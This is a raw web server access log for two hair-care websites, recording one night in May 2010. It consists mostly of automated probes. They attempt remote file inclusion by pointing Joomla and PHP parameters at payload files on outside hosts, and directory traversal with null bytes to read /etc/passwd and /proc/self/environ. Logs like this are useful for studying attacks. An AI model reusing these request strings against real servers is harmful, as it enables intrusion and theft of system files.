64.251.10.117 - - [30/May/2010:22:32:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:32:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:32:49 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:06 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:06 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:06 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:06 -0700] "GET /tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:07 -0700] "GET /logs/access_100412.log%20%20//tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:09 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:09 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:14 -0700] "GET /tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:14 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:33:15 -0700] "GET /logs/access_100412.log%20%20//tools/send_reminders.php?includedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:25 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:25 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:35 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:35 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:33:35 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:36:46 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:36:46 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:36:46 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:49 -0700] "GET /logs/access_100412.log//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:55 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:36:55 -0700] "GET /logs/access_100412.log//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:37:29 -0700] "GET /?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:37:29 -0700] "GET /logs/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:37:44 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:15 -0700] "GET /?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:16 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:16 -0700] "GET /logs/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:23 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:23 -0700] "GET /logs/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:38:23 -0700] "GET /?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:39:24 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:39:24 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:39:24 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
210.109.108.186 - - [30/May/2010:22:40:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:45 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:45 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:45 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:51 -0700] "GET /logs/access_100125.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:52 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:52 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:52 -0700] "GET /logs/access_100412.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:22:40:56 -0700] "GET /logs/access_100125.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:42:17 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:42:17 -0700] "GET /logs/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:22:42:17 -0700] "GET /?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
84.38.67.248 - - [30/May/2010:22:43:36 -0700] "GET /logs/access.log/index2.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [30/May/2010:22:43:36 -0700] "GET /index2.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
84.38.67.248 - - [30/May/2010:22:43:37 -0700] "GET /logs/index2.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
72.55.146.200 - - [30/May/2010:22:43:43 -0700] "GET /logs/access_100412.log%20//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:44:26 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.freehairsecrets.com"
213.128.84.14 - - [30/May/2010:22:44:26 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.freehairsecrets.com"
213.128.84.14 - - [30/May/2010:22:44:26 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.freehairsecrets.com"
72.55.146.200 - - [30/May/2010:22:45:50 -0700] "GET /logs/access_100412.log%20//index.php?_REQUEST=&_REQUEST[option]=com_babackup&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.117.173.251 - - [30/May/2010:22:47:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
212.117.173.251 - - [30/May/2010:22:47:29 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
213.128.84.14 - - [30/May/2010:22:48:03 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
213.128.84.14 - - [30/May/2010:22:48:03 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
213.128.84.14 - - [30/May/2010:22:48:03 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
122.112.32.51 - - [30/May/2010:22:50:37 -0700] "GET /?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.112.32.51 - - [30/May/2010:22:50:53 -0700] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.112.32.51 - - [30/May/2010:22:50:53 -0700] "GET /logs/?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.114.41.16 - - [30/May/2010:22:50:56 -0700] "GET /index2.php?otpion=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
122.112.32.51 - - [30/May/2010:23:00:09 -0700] "GET /?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.112.32.51 - - [30/May/2010:23:00:09 -0700] "GET /logs/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.112.32.51 - - [30/May/2010:23:00:10 -0700] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [30/May/2010:23:01:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6339 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:24 -0700] "GET /index.php?option=com_fabrik&controller=../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:25 -0700] "GET /index.php?option=com_fabrik&controller=../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.94.106.71 - - [30/May/2010:23:01:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.80.193.43 - - [30/May/2010:23:02:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH; MPLUS)" "www.freehairsecrets.com"
81.92.204.67 - - [30/May/2010:23:03:26 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:03:26 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:03:26 -0700] "GET /logs/access.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:36 -0700] "GET /logs/access_100322.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:36 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:36 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:41 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:41 -0700] "GET /logs/access_100322.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [30/May/2010:23:05:41 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:05:48 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:05:48 -0700] "GET /logs/access.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:23:05:48 -0700] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
